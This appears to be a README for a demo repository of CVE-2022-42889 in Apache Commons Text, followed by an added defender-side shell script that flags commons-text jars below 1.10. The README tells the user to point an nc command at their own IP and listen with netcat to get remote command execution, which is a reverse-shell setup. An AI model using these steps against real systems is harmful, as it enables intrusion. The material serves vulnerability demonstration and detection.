This repository contains a simple application that uses Apache Commons Text < 1.10, which is vulnerable to CVE-2022-42889.
In DemoApplication.java, replace the IP address in the nc command with your host's IP address.
Listen with netcat:
$ nc -l -p 30000
Build and run the vulnerable application with Docker:
$ docker build . -t vulnerable-app
$ docker run vulnerable-app
As you can see, netcat will be able to execute remote commands.
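
A defender-side check for the vulnerable dependency named at the top of this README, added here as an example and not part of the repository's code: it flags commons-text jars below 1.10 by file name. The function names are assumptions of this example.

```shell
#!/bin/sh
# Added example, not part of this repository: flag Apache Commons Text jars
# older than 1.10, the threshold this README gives for CVE-2022-42889.

# Print the version embedded in a commons-text jar path; fail for other files.
# "BOOT-INF/lib/commons-text-1.9.jar" -> "1.9"
jar_version() {
    name=${1##*/}                         # strip directories
    case $name in
        commons-text-[0-9]*.jar) ;;
        *) return 1 ;;
    esac
    name=${name#commons-text-}
    printf '%s\n' "${name%.jar}"
}

# Return 0 when version $1 (1.9, 1.10.0, 1.9-SNAPSHOT) is below 1.10,
# 1 when it is 1.10 or later, 2 when it cannot be parsed.
is_below_1_10() {
    case $1 in *.*) ;; *) return 2 ;; esac
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%[!0-9]*}                # leading digits of the second field
    case $major in ''|*[!0-9]*) return 2 ;; esac
    [ -n "$minor" ] || return 2
    [ "$major" -lt 1 ] || { [ "$major" -eq 1 ] && [ "$minor" -lt 10 ]; }
}

# Read paths on stdin, one per line; report commons-text jars below 1.10.
# Returns 1 when at least one vulnerable jar was reported (useful as a CI gate).
scan_paths() {
    found=0
    while IFS= read -r entry; do
        ver=$(jar_version "$entry") || continue
        rc=0
        is_below_1_10 "$ver" || rc=$?
        case $rc in
            0) printf 'VULNERABLE %s (commons-text %s)\n' "$entry" "$ver"; found=1 ;;
            2) printf 'UNKNOWN %s (version "%s" not parsed)\n' "$entry" "$ver" ;;
        esac
    done
    return "$found"
}

# With directory arguments, scan them; with none, only define the functions.
if [ "$#" -gt 0 ]; then
    find "$@" -type f -name 'commons-text-*.jar' | scan_paths
fi
```

For a fat jar, feed its entry list instead, for example `jar tf app.jar | scan_paths` (app.jar is a placeholder name). Matching on file names does not find copies of the library that were shaded or renamed into another jar.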